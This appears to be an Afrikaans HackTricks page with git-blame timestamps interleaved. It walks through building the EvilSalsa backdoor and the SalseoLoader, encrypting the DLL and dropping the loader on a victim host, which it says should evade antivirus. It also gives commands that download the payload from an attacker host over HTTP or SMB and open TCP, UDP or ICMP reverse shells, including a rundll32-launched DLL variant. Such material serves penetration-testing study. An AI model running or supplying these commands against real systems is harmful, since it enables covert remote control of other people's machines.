2024-04-06 18:08:38 +00:00
# Salseo
2024-07-18 22:16:31 +00:00
{% hint style="success" %}
Leer & oefen AWS Hacking:< img src = "/.gitbook/assets/arte.png" alt = "" data-size = "line" > [**HackTricks Training AWS Red Team Expert (ARTE)** ](https://training.hacktricks.xyz/courses/arte )< img src = "/.gitbook/assets/arte.png" alt = "" data-size = "line" > \
Leer & oefen GCP Hacking: < img src = "/.gitbook/assets/grte.png" alt = "" data-size = "line" > [**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line"> ](https://training.hacktricks.xyz/courses/grte )
2024-04-06 18:08:38 +00:00
2024-07-18 22:16:31 +00:00
< details >
2024-04-06 18:08:38 +00:00
2024-07-18 22:16:31 +00:00
< summary > Ondersteun HackTricks< / summary >
2024-04-06 18:08:38 +00:00
2024-07-18 22:16:31 +00:00
* Kyk na die [**subskripsie planne** ](https://github.com/sponsors/carlospolop )!
2024-05-05 22:31:04 +00:00
* **Sluit aan by die** 💬 [**Discord groep** ](https://discord.gg/hRep4RUj7f ) of die [**telegram groep** ](https://t.me/peass ) of **volg** ons op **Twitter** 🐦 [**@hacktricks\_live** ](https://twitter.com/hacktricks\_live )**.**
2024-07-18 22:16:31 +00:00
* **Deel hacking truuks deur PR's in te dien na die** [**HackTricks** ](https://github.com/carlospolop/hacktricks ) en [**HackTricks Cloud** ](https://github.com/carlospolop/hacktricks-cloud ) github repos.
2024-04-06 18:08:38 +00:00
< / details >
2024-07-18 22:16:31 +00:00
{% endhint %}
2024-04-06 18:08:38 +00:00
2024-07-18 22:16:31 +00:00
## Samevoeging van die binêre
2024-04-06 18:08:38 +00:00
2024-07-18 22:16:31 +00:00
Laai die bronkode van die github af en saam te stel **EvilSalsa** en **SalseoLoader** . Jy sal **Visual Studio** geïnstalleer moet hê om die kode saam te stel.
2024-04-06 18:08:38 +00:00
2024-07-18 22:16:31 +00:00
Stel daardie projekte saam vir die argitektuur van die Windows-boks waar jy dit gaan gebruik (As die Windows x64 ondersteun, stel dit saam vir daardie argitektuur).
2024-04-06 18:08:38 +00:00
2024-07-18 22:16:31 +00:00
Jy kan **die argitektuur kies** binne Visual Studio in die **linker "Build" Tab** in ** "Platform Target".**
2024-04-06 18:08:38 +00:00
2024-07-18 22:16:31 +00:00
(\*\*As jy nie hierdie opsies kan vind nie, druk op ** "Project Tab"** en dan op ** "\<Project Name> Properties"**)
2024-04-06 18:08:38 +00:00
2024-05-05 22:31:04 +00:00
![](< .. / . gitbook / assets / image ( 839 ) . png > )
2024-04-06 18:08:38 +00:00
2024-07-18 22:16:31 +00:00
Dan, bou albei projekte (Build -> Build Solution) (Binne die logs sal die pad van die uitvoerbare verskyn):
2024-04-06 18:08:38 +00:00
2024-05-05 22:31:04 +00:00
![](< .. / . gitbook / assets / image ( 381 ) . png > )
2024-04-06 18:08:38 +00:00
2024-07-18 22:16:31 +00:00
## Berei die Backdoor voor
2024-04-06 18:08:38 +00:00
2024-07-18 22:16:31 +00:00
Eerstens, jy sal die **EvilSalsa.dll** moet kodeer. Om dit te doen, kan jy die python skrip **encrypterassembly.py** gebruik of jy kan die projek **EncrypterAssembly** saamstel:
2024-04-06 18:08:38 +00:00
### **Python**
```
python EncrypterAssembly/encrypterassembly.py < FILE > < PASSWORD > < OUTPUT_FILE >
python EncrypterAssembly/encrypterassembly.py EvilSalsax.dll password evilsalsa.dll.txt
```
2024-04-07 05:33:57 +00:00
### Windows
2024-04-06 18:08:38 +00:00
```
EncrypterAssembly.exe < FILE > < PASSWORD > < OUTPUT_FILE >
EncrypterAssembly.exe EvilSalsax.dll password evilsalsa.dll.txt
```
2024-07-18 22:16:31 +00:00
Ok, nou het jy alles wat jy nodig het om al die Salseo goed te uitvoer: die **gecodeerde EvilDalsa.dll** en die **binarie van SalseoLoader.**
2024-04-06 18:08:38 +00:00
2024-07-18 22:16:31 +00:00
**Laai die SalseoLoader.exe binarie op die masjien. Hulle behoort nie deur enige AV opgespoor te word nie...**
2024-04-06 18:08:38 +00:00
2024-07-18 22:16:31 +00:00
## **Voer die backdoor uit**
2024-04-06 18:08:38 +00:00
2024-07-18 22:16:31 +00:00
### **Kry 'n TCP reverse shell (aflaai van die gecodeerde dll deur HTTP)**
2024-04-06 18:08:38 +00:00
2024-07-18 22:16:31 +00:00
Onthou om 'n nc as die reverse shell luisteraar te begin en 'n HTTP bediener op te stel om die gecodeerde evilsalsa te bedien.
2024-04-06 18:08:38 +00:00
```
SalseoLoader.exe password http://< Attacker-IP > /evilsalsa.dll.txt reversetcp < Attacker-IP > < Port >
```
2024-07-18 22:16:31 +00:00
### **Kry 'n UDP omgekeerde skulp (aflaai van kodering dll deur SMB)**
2024-04-06 18:08:38 +00:00
2024-07-18 22:16:31 +00:00
Onthou om 'n nc as die omgekeerde skulp luisteraar te begin, en 'n SMB-bediener om die gekodeerde evilsalsa (impacket-smbserver) te bedien.
2024-04-06 18:08:38 +00:00
```
SalseoLoader.exe password \\< Attacker-IP > /folder/evilsalsa.dll.txt reverseudp < Attacker-IP > < Port >
```
2024-07-18 22:16:31 +00:00
### **Kry 'n ICMP omgekeerde skulp (gecodeerde dll reeds binne die slagoffer)**
2024-04-06 18:08:38 +00:00
2024-07-18 22:16:31 +00:00
**Hierdie keer het jy 'n spesiale hulpmiddel in die kliënt nodig om die omgekeerde skulp te ontvang. Laai af:** [**https://github.com/inquisb/icmpsh** ](https://github.com/inquisb/icmpsh )
2024-04-06 18:08:38 +00:00
2024-05-05 22:31:04 +00:00
#### **Deaktiveer ICMP Antwoorde:**
2024-04-06 18:08:38 +00:00
```
sysctl -w net.ipv4.icmp_echo_ignore_all=1
#You finish, you can enable it again running:
sysctl -w net.ipv4.icmp_echo_ignore_all=0
```
2024-04-07 05:33:57 +00:00
#### Voer die kliënt uit:
2024-04-06 18:08:38 +00:00
```
python icmpsh_m.py "< Attacker-IP > " "< Victm-IP > "
```
#### Binne die slagoffer, laat ons die salseo ding uitvoer:
```
SalseoLoader.exe password C:/Path/to/evilsalsa.dll.txt reverseicmp < Attacker-IP >
```
2024-07-18 22:16:31 +00:00
## Samevoeging van SalseoLoader as DLL wat hoof funksie uitvoer
2024-04-06 18:08:38 +00:00
2024-07-18 22:16:31 +00:00
Open die SalseoLoader projek met Visual Studio.
2024-04-06 18:08:38 +00:00
2024-07-18 22:16:31 +00:00
### Voeg voor die hoof funksie by: \[DllExport]
2024-04-06 18:08:38 +00:00
2024-05-05 22:31:04 +00:00
![](< .. / . gitbook / assets / image ( 409 ) . png > )
2024-04-06 18:08:38 +00:00
### Installeer DllExport vir hierdie projek
2024-07-18 22:16:31 +00:00
#### **Gereedskap** --> **NuGet Pakketbestuurder** --> **Bestuur NuGet Pakkette vir Oplossing...**
2024-04-06 18:08:38 +00:00
2024-05-05 22:31:04 +00:00
![](< .. / . gitbook / assets / image ( 881 ) . png > )
2024-04-06 18:08:38 +00:00
2024-07-18 22:16:31 +00:00
#### **Soek vir DllExport pakket (met die Blader tab), en druk Installeer (en aanvaar die pop-up)**
2024-04-06 18:08:38 +00:00
2024-05-05 22:31:04 +00:00
![](< .. / . gitbook / assets / image ( 100 ) . png > )
2024-04-06 18:08:38 +00:00
In jou projekmap het die lêers verskyn: **DllExport.bat** en **DllExport\_Configure.bat**
2024-07-18 22:16:31 +00:00
### **U**ninstalleer DllExport
2024-04-06 18:08:38 +00:00
2024-07-18 22:16:31 +00:00
Druk **Uninstall** (ja, dit is vreemd maar glo my, dit is nodig)
2024-04-06 18:08:38 +00:00
2024-05-05 22:31:04 +00:00
![](< .. / . gitbook / assets / image ( 97 ) . png > )
2024-04-06 18:08:38 +00:00
2024-07-18 22:16:31 +00:00
### **Verlaat Visual Studio en voer DllExport\_configure uit**
2024-04-06 18:08:38 +00:00
2024-07-18 22:16:31 +00:00
Net **verlaat** Visual Studio
2024-04-06 18:08:38 +00:00
2024-07-18 22:16:31 +00:00
Gaan dan na jou **SalseoLoader gids** en **voer DllExport\_Configure.bat** uit
2024-04-06 18:08:38 +00:00
2024-07-18 22:16:31 +00:00
Kies **x64** (as jy dit binne 'n x64 boks gaan gebruik, dit was my geval), kies **System.Runtime.InteropServices** (binne **Namespace vir DllExport** ) en druk **Toepas**
2024-04-06 18:08:38 +00:00
2024-05-05 22:31:04 +00:00
![](< .. / . gitbook / assets / image ( 882 ) . png > )
2024-04-06 18:08:38 +00:00
2024-07-18 22:16:31 +00:00
### **Open die projek weer met Visual Studio**
2024-04-06 18:08:38 +00:00
2024-07-18 22:16:31 +00:00
**\[DllExport]** moet nie langer as 'n fout gemerk wees nie
2024-04-06 18:08:38 +00:00
2024-05-05 22:31:04 +00:00
![](< .. / . gitbook / assets / image ( 670 ) . png > )
2024-04-06 18:08:38 +00:00
### Bou die oplossing
2024-07-18 22:16:31 +00:00
Kies **Uitset tipe = Klas Biblioteek** (Projek --> SalseoLoader Eienskappe --> Aansoek --> Uitset tipe = Klas Biblioteek)
2024-04-06 18:08:38 +00:00
2024-05-05 22:31:04 +00:00
![](< .. / . gitbook / assets / image ( 847 ) . png > )
2024-04-06 18:08:38 +00:00
Kies **x64** **platform** (Projek --> SalseoLoader Eienskappe --> Bou --> Platform teiken = x64)
2024-05-05 22:31:04 +00:00
![](< .. / . gitbook / assets / image ( 285 ) . png > )
2024-04-06 18:08:38 +00:00
2024-07-18 22:16:31 +00:00
Om die oplossing te **bou** : Bou --> Bou Oplossing (Binne die Uitset konsole sal die pad van die nuwe DLL verskyn)
2024-04-06 18:08:38 +00:00
### Toets die gegenereerde Dll
Kopieer en plak die Dll waar jy dit wil toets.
Voer uit:
```
rundll32.exe SalseoLoader.dll,main
```
2024-07-18 22:16:31 +00:00
As daar geen fout verskyn nie, het jy waarskynlik 'n funksionele DLL!!
2024-04-06 18:08:38 +00:00
2024-07-18 22:16:31 +00:00
## Kry 'n shell met die DLL
2024-04-06 18:08:38 +00:00
2024-07-18 22:16:31 +00:00
Moet nie vergeet om 'n **HTTP** **bediener** te gebruik en 'n **nc** **luisteraar** in te stel nie
2024-04-06 18:08:38 +00:00
### Powershell
```
$env:pass="password"
$env:payload="http://10.2.0.5/evilsalsax64.dll.txt"
$env:lhost="10.2.0.5"
$env:lport="1337"
$env:shell="reversetcp"
rundll32.exe SalseoLoader.dll,main
```
### CMD
```
set pass=password
set payload=http://10.2.0.5/evilsalsax64.dll.txt
set lhost=10.2.0.5
set lport=1337
set shell=reversetcp
rundll32.exe SalseoLoader.dll,main
```
2024-07-18 22:16:31 +00:00
{% hint style="success" %}
Leer & oefen AWS Hacking:< img src = "/.gitbook/assets/arte.png" alt = "" data-size = "line" > [**HackTricks Opleiding AWS Red Team Expert (ARTE)** ](https://training.hacktricks.xyz/courses/arte )< img src = "/.gitbook/assets/arte.png" alt = "" data-size = "line" > \
Leer & oefen GCP Hacking: < img src = "/.gitbook/assets/grte.png" alt = "" data-size = "line" > [**HackTricks Opleiding GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line"> ](https://training.hacktricks.xyz/courses/grte )
2024-04-06 18:08:38 +00:00
2024-07-18 22:16:31 +00:00
< details >
2024-04-06 18:08:38 +00:00
2024-07-18 22:16:31 +00:00
< summary > Ondersteun HackTricks< / summary >
2024-04-06 18:08:38 +00:00
2024-07-18 22:16:31 +00:00
* Kyk na die [**subskripsie planne** ](https://github.com/sponsors/carlospolop )!
* **Sluit aan by die** 💬 [**Discord groep** ](https://discord.gg/hRep4RUj7f ) of die [**telegram groep** ](https://t.me/peass ) of **volg** ons op **Twitter** 🐦 [**@hacktricks\_live** ](https://twitter.com/hacktricks\_live )**.**
* **Deel hacking truuks deur PRs in te dien na die** [**HackTricks** ](https://github.com/carlospolop/hacktricks ) en [**HackTricks Cloud** ](https://github.com/carlospolop/hacktricks-cloud ) github repos.
2024-04-06 18:08:38 +00:00
2024-07-18 22:16:31 +00:00
< / details >
{% endhint %}